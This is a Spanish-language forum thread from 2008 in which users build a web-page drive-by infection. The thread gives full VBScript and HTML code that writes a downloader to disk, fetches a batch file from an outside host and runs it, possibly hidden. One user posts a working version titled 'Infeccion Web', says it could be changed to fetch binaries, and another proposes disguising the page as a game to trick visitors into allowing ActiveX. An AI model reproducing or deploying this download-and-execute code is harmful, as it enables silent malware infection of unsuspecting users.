 Autor
|
Tema: [HTML-VBS-Batch] Propagacion a traves de Internet ? Posible ? (Leído 6,762 veces)
|
SmartGenius
 Desconectado
Mensajes: 181
:P
|
Tenemos como base el siguiente codigo... http://two.xthost.info/smartgenius/codigo.txtArchivo BAT de Pruebamode con cols=60
mode con lines=20
@echo off
title Propagacion a traves de Internet - By :: SmartGenius ::
color 0a
:ini
cls
echo.
echo.
echo Este es un Archivo de Comandos BATCH descargado
echo a traves de internet mediante un Script VBS
echo insertado en una Pagina HTML.
echo.
echo El Script es capaz de Bajar y Ejecutar Codigo, casi
echo sin permiso del Usuario...
echo.
echo Por ahora es Solo una idea, pero espero poder
echo desarrollarlo completamente...
echo.
echo Un Saludo... ;)
echo.
pause
exit El cual puede ser una serie de comandos Batch, ya sea de virus o bromas o cualquier otra cosa, o puede ser tambien cualquier otro archivo... Ahora tomemos un script VBS que nos descarga y nos ejecuta el archivo... VBS DownloaderSet aVar = CreateObject("Microsoft.XMLHTTP")
aVar.Open "GET","http://two.xthost.info/smartgenius/codigo.txt",0
aVar.Send()
Set sDow = CreateObject("ADODB.Stream")
sDow.Mode = 3
sDow.Type = 1
sDow.Open()
sDow.Write(aVar.responseBody)
sDow.SaveToFile "codigo.bat",2
Set codigo = CreateObject("WScript.Shell")
codigo.Run "Codigo.bat"y por ultimo una pagina HTML con codigo VBS insertado para crear archivos de texto plano en la PC... Pagina HTML Decorada...xD<HTML>
<HEAD><TITLE>.:: SmartGenius - powered by iSmart ::.</TITLE>
</HEAD>
<BODY bgColor=#000000 text="green">
<script language="vbs">
Dim smart, archivo
Set smart = CreateObject("Scripting.FileSystemObject")
set archivo= smart.CreateTextFile("pepito.bat", True)
archivo.WriteLine("@echo off")
archivo.WriteLine("title SmartGenius")
archivo.WriteLine("color 0a")
archivo.WriteLine("echo Hola")
archivo.WriteLine("echo Codigo de Prueba")
archivo.WriteLine("pause")
archivo.close
</script>
<center><h1>Propagacion de Code a traves de Internet</h1><br><br>Demostracion de Descarga y Ejecucion de Codigo...by :: SmartGenius ::</center>
</BODY>
</HTML> Entonces, la pagina HTML crea un archio en la PC, en este caso un Bat que dice prueba y no mas... La teoria seria que la pagina HTML creara y ejecutara el segundo codigo, el VBS Downloader y este se encarga de descargar y ejecutar el resto... Pueden guardar el VBS Downloader y ejecutarlo y veran como descarga y ejecuta el otro bat, y seria posible hacerlo de manera oculta agregando al final ,vbHide... Hasta aqui todo bien, lo unico que no logro hacer es crear el codigo del VBS Downloader a partir de la pagina HTML.... ya que como es un code VBS creando otro VBS es en ese momento donde hay un problema porque hay ciertos caracteres y funciones reservadas, y no logro que el code salga bien... Es por ahora una teoria, pero espero poder desarrollarla completamente y dar una nueva posibilidad de propagacion a nuestros codes... Agradeceria un poco de ayuda, de los expertos en VBS...NovLucker ??.. Un Saludo.
|
|
|
|
|
En línea
|
|
|
|
Darioxhcx
Desconectado
Mensajes: 2.294
|
mmmmm yo x ejemplo lo unico que se hacer es usar la cmd con vbs lo hacia cuando usaba troyanos xD , necesitaba ejecutar un "server.exe" q estaba en programfiles pero buee Script Language="VBScript">
Set shell = createObject("Wscript.shell")
shell.run("cmd.exe /c @echo off & echo hola soy dario & pause")
</Script>
<H1 align="center">...</H1>
<H4 align="center">...<BR>
<H1 align="center">para ver de la web de forma correcta debe habilitar los componentes</H1>
<H4 align="center">se recomienda usar internet explorer para el funcionamiento de la pagina..</H4>
pero no anda con firefox, o por lo menos a mi no me andubo, solo con explorer capas que te sirve saludos
|
|
|
|
|
En línea
|
|
|
|
Zaraki_lkenpachi
Desconectado
Mensajes: 54
|
Hye Dario xD bah has usado troyanos :O y me recomiendas no meterme a la programacion de ellos xD jajaja bueno bueno Ok Np  y bueno gracias por el Codigo voy a investigar como usar esto del Microsoft.XMLHTTP y ADOdb |
|
|
|
|
En línea
|
|
|
|
Novlucker
Ninja y
Colaborador
Desconectado
Mensajes: 10.683
Yo que tu lo pienso dos veces
|
Buenas :: SmartGenius ::  Bueno, ese metodo que comentas.. también yo lo he utilizado (solo el vbs, no en html).. y me ha funcionado, los archivos se bajan.. y nadie se entera.... pero en más de una ocasión he tenido problemas a la hora de crear el objeto "Microsoft.XMLHTTP", y por más que he intentado... no ha habido manera de desaparecer un error que salta a la hora de su creación  .. no se si esto venga por temas de algún parche o limitaciones que pueda tener un sistema... un claro ejemplo de esto puede ser el objeto que se utiliza para automatización del outlook.... el cual, después de la aparición de virus como el Ana Kournikova, microsoft limito casi enteramente su uso.... Y con respecto a lo del *.vbs embedido en la web... más dificil aún...y te muestro un claro ejemplo....  No digo que sea imposible.. pero por temas de seguridad... los objetos activex están siendo seguidos muuuuy de cerca  Saludos |
|
|
|
« Última modificación: 21 Julio 2008, 16:12 pm por Novlucker »
|
En línea
|
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez humana. Y de la primera no estoy muy seguro." Albert Einstein |
|
|
Darioxhcx
Desconectado
Mensajes: 2.294
|
Hye Dario xD bah has usado troyanos :O y me recomiendas no meterme a la programacion de ellos xD jajaja bueno bueno Ok Np y bueno gracias por el Codigo voy a investigar como usar esto del Microsoft.XMLHTTP y ADOdb use troyanos durante una semana para conocer como eran, tmb saber como prevenirlo pero mis post nunca fueron "como puedo crear un troyano o un virus ?" no se puede aprender mucho de ellos, pero sirven de algo ademas usaba cosas x ejemplo, esconderlo con la cmd atras de un .jpg , keda como extension .jpg y lo ejecuto de este script en vbs q puse arriba pero creo que ya me estoy llendo del tema principal perdon saludos
|
|
|
|
|
En línea
|
|
|
|
Zaraki_lkenpachi
Desconectado
Mensajes: 54
|
Ok no hay problema  no estoy juzgando a nadie solo decia  y mucho gusto Dario ... con respecto a eso del ActiveX es cierto todas las paginas son bloqueadas .. con el Filtro de Seguridad del IE 7.0 pero quien sabe habra algo para desactivarlas  y por un enlace de Web ejecutar Script en un equipo Cliente |
|
|
|
|
En línea
|
|
|
|
Novlucker
Ninja y
Colaborador
Desconectado
Mensajes: 10.683
Yo que tu lo pienso dos veces
|
:: SmartGenius ::... he aquí el code..... lo he probado, y funciona correctamente.... pero como comenté antes... primero salta la barra del iexplorer, y luego, cuando le das ok a que permita el contenido bloqueado, cada vez que se entre a la página, saltará un nuevo mensaje avisando de un control activex...  En definitiva... el code html (basado en el tuyo) <HTML>
<HEAD><TITLE>Novlucker</TITLE>
</HEAD>
<BODY bgColor=#000000 text="blue">
<script language="vbs">
set objfso = createobject("scripting.filesystemobject")
set download = objfso.createtextfile("downloader.vbs",true)
download.writeline "set objxml = CreateObject(""Microsoft.XMLHTTP"")"
download.writeline "objxml.Open ""GET"",""http://usuarios.lycos.es/novlucker/vbs/bat.txt"",0"
download.writeline "objxml.Send()"
download.writeline "set objado = CreateObject(""ADODB.Stream"")"
download.writeline "objado.Mode = 3"
download.writeline "objado.Type = 1"
download.writeline "objado.Open()"
download.writeline "objado.Write(objxml.responseBody)"
download.writeline "objado.SaveToFile ""codigo.bat"",2"
download.writeline "set objshell = CreateObject(""WScript.Shell"")"
download.writeline "objshell.run ""Codigo.bat"""
download.close
set objshell = createobject("wscript.shell")
objshell.run "downloader.vbs"
</script>
<center><h1>Infeccion Web</h1><br><br>By Novlucker</center>
</BODY>
</HTML> Esta página crea un archivo llamado "downloader.vbs" y lo ejecuta... a su vez, este archivo... descarga un "bat.txt" y también lo ejecuta.... Lo he subido aqui(click) por si alguien quiere probar,esta el html, y el bat, si desconfian, máquina virtual ,y sino bueno, suban ustedes mismos los archivos a algun host gratuito Comentar además que hace algún tiempo había probado hacer esto y alguna otra cosa parecida.... pero me parecía que no resultaba justamente por las alertas que lanza el navegador, las cuales además vienen por defecto Eso fue todo Saludos [Modifico] Nota: Tener en cuenta además que el método utilizado, solo permite descargar texto plano, por lo que en este caso no hay problemas ya que se trata de un *.bat..... pero con un par de modificaciones se podrían bajar ejecutables/binarios 
|
|
|
|
« Última modificación: 21 Julio 2008, 16:25 pm por Novlucker »
|
En línea
|
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez humana. Y de la primera no estoy muy seguro." Albert Einstein |
|
|
SmartGenius
Desconectado
Mensajes: 181
:P
|
Ok, NovLucer.. muchisimas gracias por tu ayuda, se ve que sabes bastante de VBS.. Claro que salta el aviso del control active X, pero se puede camuflar la pagina con un juego o algo asi, y bien decoradita, pues seguro que alguie tendra que caer... Saludos. |
|
|
|
|
En línea
|
|
|
|
Novlucker
Ninja y
Colaborador
Desconectado
Mensajes: 10.683
Yo que tu lo pienso dos veces
|
Claro que salta el aviso del control active X, pero se puede camuflar la pagina con un juego o algo asi, y bien decoradita, pues seguro que alguie tendra que caer... Bueno, en eso te doy la razón, hay muchas personas que no tienen idea de nada .... un último inconveniente..... este tipo de método puede ser reconocido por los AV como un downloader, por ejemplo el KIS me tira aviso de que se trata de un Trojan-Downloader.VBS.Small.l... ya que este método fue utilizado hace mucho tiempo por algunos virus *.vbs  Saludos
|
|
|
|
« Última modificación: 22 Julio 2008, 04:30 am por Novlucker »
|
En línea
|
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez humana. Y de la primera no estoy muy seguro." Albert Einstein |
|
|
|
| Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
|
[Batch] Propagación y autoejecución
Scripting
|
RavenUreNotAlone
|
0
|
1,767
|
8 Enero 2013, 03:20 am
por RavenUreNotAlone
|
|
|
|
Internet ultrarrápido, posible a través de líneas telefónicas antiguas
Noticias
|
wolfbcn
|
0
|
2,360
|
5 Agosto 2013, 02:06 am
por wolfbcn
|
|
|
|
Propagación a través de µTorrent
Análisis y Diseño de Malware
|
Ethicalsk
|
1
|
2,746
|
12 Septiembre 2017, 02:30 am
por engel lex
|
|
|
|
Propagación de malware a través de wifi?
Análisis y Diseño de Malware
|
Skali
|
3
|
6,250
|
23 Febrero 2018, 07:38 am
por warcry.
|
|
|
|
La Policía alerta de la propagación de un virus a través de correos ....
Noticias
|
wolfbcn
|
0
|
1,706
|
10 Enero 2019, 22:07 pm
por wolfbcn
|
 |
